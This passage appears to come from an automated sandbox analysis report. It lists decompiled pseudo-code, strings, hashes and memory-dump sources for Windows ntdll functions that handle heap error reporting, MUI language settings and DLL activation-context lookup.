hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 765b9b45b35e89747a219565b9eef8a599f3803779fa4eb6e7fa28fb658803bd
Instruction ID: ba98afd2f91f13fa3545d68355f759dac4dea709b73740e6c7c8514cfeba52cb
Opcode Fuzzy Hash: 765b9b45b35e89747a219565b9eef8a599f3803779fa4eb6e7fa28fb658803bd
Instruction Fuzzy Hash: 7D811135A40210FFEB336B098C46E6B3B27FF96B69F8440C5F5062B116DB618501CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 02B41C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E02B41C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x2a648a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02A8B150();
				} else {
					E02A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x2b7589c);
				E02A8B150("Heap error detected at %p (heap handle %p)\n",  *0x2b758a0);
				_t27 =  *0x2b75898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M02B41E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02A8B150();
				} else {
					E02A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E02A8B150("Error code: %d - %s\n",  *0x2b75898);
				_t113 =  *0x2b758a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02A8B150();
					} else {
						E02A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02A8B150("Parameter1: %p\n",  *0x2b758a4);
				}
				_t115 =  *0x2b758a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02A8B150();
					} else {
						E02A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02A8B150("Parameter2: %p\n",  *0x2b758a8);
				}
				_t117 =  *0x2b758ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02A8B150();
					} else {
						E02A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02A8B150("Parameter3: %p\n",  *0x2b758ac);
				}
				_t119 =  *0x2b758b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02A8B150();
					} else {
						E02A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x2b758b4);
					E02A8B150("Last known valid blocks: before - %p, after - %p\n",  *0x2b758b0);
				} else {
					_t120 =  *0x2b758b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02A8B150();
				} else {
					E02A8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E02A8B150("Stack trace available at %p\n", 0x2b758c0);
			}

0x02b41c10
0x02b41c16
0x02b41c1e
0x02b41c3d
0x02b41c3e
0x02b41c20
0x02b41c35
0x02b41c3a
0x02b41c44
0x02b41c55
0x02b41c5a
0x02b41c65
0x02b41c67
0x00000000
0x02b41c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02b41c67
0x02b41cdc
0x02b41ce5
0x02b41d04
0x02b41d05
0x02b41ce7
0x02b41cfc
0x02b41d01
0x02b41d0b
0x02b41d17
0x02b41d1f
0x02b41d25
0x02b41d30
0x02b41d4f
0x02b41d50
0x02b41d32
0x02b41d47
0x02b41d4c
0x02b41d61
0x02b41d67
0x02b41d68
0x02b41d6e
0x02b41d79
0x02b41d98
0x02b41d99
0x02b41d7b
0x02b41d90
0x02b41d95
0x02b41daa
0x02b41db0
0x02b41db1
0x02b41db7
0x02b41dc2
0x02b41de1
0x02b41de2
0x02b41dc4
0x02b41dd9
0x02b41dde
0x02b41df3
0x02b41df9
0x02b41dfa
0x02b41e00
0x02b41e0a
0x02b41e13
0x02b41e32
0x02b41e33
0x02b41e15
0x02b41e2a
0x02b41e2f
0x02b41e39
0x02b41e4a
0x02b41e02
0x02b41e02
0x02b41e08
0x00000000
0x00000000
0x02b41e08
0x02b41e5b
0x02b41e7a
0x02b41e7b
0x02b41e5d
0x02b41e72
0x02b41e77
0x02b41e95

Strings

heap_failure_entry_corruption, xrefs: 02B41C83
Heap error detected at %p (heap handle %p), xrefs: 02B41C50
Error code: %d - %s, xrefs: 02B41D12
Parameter1: %p, xrefs: 02B41D5C
HEAP: , xrefs: 02B41C16, 02B41C3D, 02B41D04, 02B41D4F, 02B41D98, 02B41DE1, 02B41E32, 02B41E7A
HEAP[%wZ]: , xrefs: 02B41C30, 02B41CF7, 02B41D42, 02B41D8B, 02B41DD4, 02B41E25, 02B41E6D
heap_failure_usage_after_free, xrefs: 02B41CBB
heap_failure_invalid_argument, xrefs: 02B41CAD
heap_failure_multiple_entries_corruption, xrefs: 02B41C8A
Last known valid blocks: before - %p, after - %p, xrefs: 02B41E45
Stack trace available at %p, xrefs: 02B41E86
heap_failure_unknown, xrefs: 02B41C75
heap_failure_virtual_block_corruption, xrefs: 02B41C91
heap_failure_invalid_allocation_type, xrefs: 02B41CB4
Parameter2: %p, xrefs: 02B41DA5
heap_failure_lfh_bitmap_mismatch, xrefs: 02B41CD7
Parameter3: %p, xrefs: 02B41DEE
heap_failure_freelists_corruption, xrefs: 02B41CC9
heap_failure_buffer_overrun, xrefs: 02B41C98
heap_failure_buffer_underrun, xrefs: 02B41C9F
heap_failure_listentry_corruption, xrefs: 02B41CD0
heap_failure_generic, xrefs: 02B41C7C
heap_failure_cross_heap_operation, xrefs: 02B41CC2
heap_failure_block_not_busy, xrefs: 02B41CA6
heap_failure_internal, xrefs: 02B41C6E

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 258693ac5b18ff7e0666ba6c7e01a33644e0830df5625e19749c16a6fde33a61
Instruction ID: 5c2c4b7f1796e68142866c5b874d1b56f91b364a5553a3c066ed0e848a3252e5
Opcode Fuzzy Hash: 258693ac5b18ff7e0666ba6c7e01a33644e0830df5625e19749c16a6fde33a61
Instruction Fuzzy Hash: 8A619136DA5144DFE211AB88DAC4D3173A5EB04F24B0984EAF80E9F212DE7598C4EF19

Uniqueness

Uniqueness Score: -1.00%

Function 02A93D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02A93D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E02A91B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E02A91B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E02A91B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E02A91B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E02A91B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L02AA4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E02ACF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E02AD1370(_t276, 0x2a64e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E02ACBB40(0,  &_v68, _t170);
									if(L02A943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E02ACBB40(_t257,  &_v68, _t243);
								if(L02A943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E02AD1370(_t278, 0x2a64e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L02AA4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E02ACF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E02AD1370(_v16, 0x2a64e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E02ACBB40(_t262,  &_v68, _t244);
								if(L02A943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E02AD1370(_t282, 0x2a64e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E02ACBB40(_t262,  &_v68, _t201);
							if(L02A943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L02AA4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E02ACF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E02AD1370(_t280, 0x2a64e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E02ACBB40(_t267,  &_v68, _t245);
							if(L02A943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E02AD1370(_t284, 0x2a64e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E02ACBB40(_t267,  &_v68, _t224);
						if(L02A943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x02a93d3c
0x02a93d42
0x02a93d44
0x02a93d46
0x02a93d49
0x02a93d4c
0x02a93d4f
0x02a93d52
0x02a93d55
0x02a93d58
0x02a93d5b
0x02a93d5f
0x02a93d61
0x02a93d66
0x02ae8213
0x02ae8218
0x02a94085
0x02a94088
0x02a9408e
0x02a94094
0x02a9409a
0x02a940a0
0x02a940a6
0x02a940a9
0x02a940af
0x02a940b6
0x02a940bd
0x02a940bd
0x02a93d83
0x02ae821f
0x02ae8229
0x02ae8238
0x02ae8238
0x02ae823d
0x02ae823d
0x02a93da0
0x02a93daf
0x02a93db5
0x02a93dba
0x02a93dba
0x02a93dd4
0x02a93e94
0x02a93eab
0x02a93f6d
0x02a93f84
0x02a9406b
0x02a9406b
0x02a9406e
0x02a9406e
0x02a94070
0x02a94074
0x02ae8351
0x02ae8351
0x02a9407a
0x02a9407f
0x02ae835d
0x02ae8370
0x02ae8377
0x02ae8379
0x02ae837c
0x02ae837c
0x02ae835d
0x00000000
0x02a9407f
0x02a93f8a
0x02a93f8d
0x02a93f90
0x02a93f95
0x02ae830d
0x02ae830f
0x02a93f9b
0x02a93fac
0x02a93fae
0x02a93fb1
0x02a93fb1
0x02a93fb6
0x02ae8317
0x02ae831a
0x00000000
0x02a93fbc
0x02a93fc1
0x02a93fc9
0x02a93fd7
0x02a93fda
0x02a93fdd
0x02a94021
0x02a94021
0x02a94029
0x02a94030
0x02a94044
0x02a94046
0x02a94046
0x02a94044
0x02a94049
0x02ae8327
0x02ae8334
0x02ae8339
0x02ae833c
0x02a9404f
0x02a9404f
0x02a9404f
0x02a94051
0x02a94056
0x02a94063
0x02a94063
0x02a94068
0x00000000
0x02a94068
0x02a93fdf
0x02a93fe2
0x02a93fe4
0x02a93fe7
0x02a93fef
0x02a94003
0x02a94005
0x02a94005
0x02a9400c
0x02a94013
0x02a94016
0x02a94017
0x02a9401b
0x02a9401e
0x00000000
0x02a9401e
0x02a93fb6
0x02a93eb1
0x02a93eb4
0x02a93eb7
0x02a93ebc
0x02ae82a9
0x02ae82ab
0x02a93ec2
0x02a93ed3
0x02a93ed5
0x02a93ed8
0x02a93ed8
0x02a93edd
0x02ae82b3
0x02ae82b6
0x00000000
0x02a93ee3
0x02a93ee8
0x02a93eed
0x02a93ef0
0x02a93ef3
0x02a93f02
0x02a93f05
0x02a93f08
0x02ae82c0
0x02ae82c3
0x02ae82c5
0x02ae82c8
0x02ae82d0
0x02ae82e4
0x02ae82e6
0x02ae82e6
0x02ae82ed
0x02ae82f4
0x02ae82f7
0x02ae82f8
0x02ae82fc
0x02ae82ff
0x02ae82ff
0x02a93f0e
0x02a93f11
0x02a93f16
0x02a93f1d
0x02a93f31
0x02ae8307
0x02ae8307
0x02a93f31
0x02a93f39
0x02a93f48
0x02a93f4d
0x02a93f50
0x02a93f50
0x02a93f53
0x02a93f58
0x02a93f65
0x02a93f65
0x02a93f6a
0x00000000
0x02a93f6a
0x02a93edd
0x02a93dda
0x02a93ddd
0x02a93de0
0x02a93de5
0x02ae8245
0x02a93deb
0x02a93df7
0x02a93dfc
0x02a93dfe
0x02a93e01
0x02a93e01
0x02a93e06
0x02ae824d
0x02ae824f
0x02ae8254
0x00000000
0x02a93e0c
0x02a93e11
0x02a93e16
0x02a93e19
0x02a93e29
0x02a93e2c
0x02a93e2f
0x02ae825c
0x02ae825f
0x02ae8261
0x02ae8264
0x02ae826c
0x02ae8280
0x02ae8282
0x02ae8282
0x02ae8289
0x02ae8290
0x02ae8293
0x02ae8294
0x02ae8298
0x02ae829b
0x02ae829b
0x02a93e35
0x02a93e38
0x02a93e3d
0x02a93e44
0x02a93e58
0x02ae82a3
0x02ae82a3
0x02a93e58
0x02a93e60
0x02a93e6f
0x02a93e74
0x02a93e77
0x02a93e77
0x02a93e7a
0x02a93e7f
0x02a93e8c
0x02a93e8c
0x02a93e91
0x00000000
0x02a93e91

Strings

WindowsExcludedProcs, xrefs: 02A93D6F
Kernel-MUI-Language-SKU, xrefs: 02A93F70
Kernel-MUI-Number-Allowed, xrefs: 02A93D8C
Kernel-MUI-Language-Allowed, xrefs: 02A93DC0
Kernel-MUI-Language-Disallowed, xrefs: 02A93E97

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: b81af85475b10e123062d1d82ad7712eafeea25265ffe15a0e61c1a38756984d
Instruction ID: 6c75f836e8e1b041251d64f8eb0a8f01c269f9eb72811f33ad95e110d99efbb5
Opcode Fuzzy Hash: b81af85475b10e123062d1d82ad7712eafeea25265ffe15a0e61c1a38756984d
Instruction Fuzzy Hash: 80F10A72D40619EFCF11DF99C980AEEB7F9AF48750F1540AAE505A7210DB759E01CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AB8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E02AB8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x2b7d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x2b78464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x2b75780 & 0x00000003) != 0) {
							E02B05510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x2b75780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E02ACB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x2b77984; // 0x2481dd8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x2b78464; // 0x73b80110
					 *0x2b7b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E02AB9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x2b75780 & 0x00000005) != 0) {
						_push(_t49);
						E02B05510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x02ab8e0f
0x02ab8e16
0x02ab8e19
0x02ab8e1b
0x02ab8e21
0x02ab8e7f
0x02ab8e85
0x02af9354
0x02af936c
0x02af9371
0x02af937b
0x02af9381
0x02af9381
0x02af937b
0x02ab8e9d
0x02ab8e9d
0x02ab8e29
0x02ab8e2c
0x02ab8e38
0x02ab8e3e
0x02ab8e43
0x02ab8eb5
0x02ab8eb9
0x02af92aa
0x02af92af
0x02af92e8
0x02af92e8
0x02af92af
0x02ab8eb9
0x02ab8e45
0x02ab8e53
0x02ab8e5b
0x02ab8e5f
0x02ab8e78
0x02ab8e78
0x02ab8e7d
0x02ab8ec3
0x02ab8ecd
0x02ab8ed2
0x02ab8ed2
0x02ab8ec5
0x02ab8ec5
0x00000000
0x02ab8e7d
0x02ab8e67
0x02ab8ea4
0x02af931a
0x00000000
0x00000000
0x02af9320
0x02ab8ea4
0x02ab8e70
0x02af9325
0x02af9340
0x02af9345
0x02af9345
0x02ab8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02AF932A
LdrpFindDllActivationContext, xrefs: 02AF9331, 02AF935D
minkernel\ntdll\ldrsnap.c, xrefs: 02AF933B, 02AF9367
Querying the active activation context failed with status 0x%08lx, xrefs: 02AF9357

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 7b8a3ae1509d08f79c4a42ca187d5227e6311e054fc4d34a4d3bc8d2e293d478
Instruction ID: d53ca152e59b593be9e5d217bcc819f6004bad6095a7074a26c2d1cc3344e8ca
Opcode Fuzzy Hash: 7b8a3ae1509d08f79c4a42ca187d5227e6311e054fc4d34a4d3bc8d2e293d478
Instruction Fuzzy Hash: 8041D639A40211AEDB376B1C88C9BBAB6BDBF00648F094569E90557153EF78DC80CE81

Uniqueness

Uniqueness Score: -1.00%

Function 02A98794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E02A98794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E02A9934A() != 0) {
								_t159 = E02B0A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x2b75780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E02B05510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x2b75780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E02A9849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
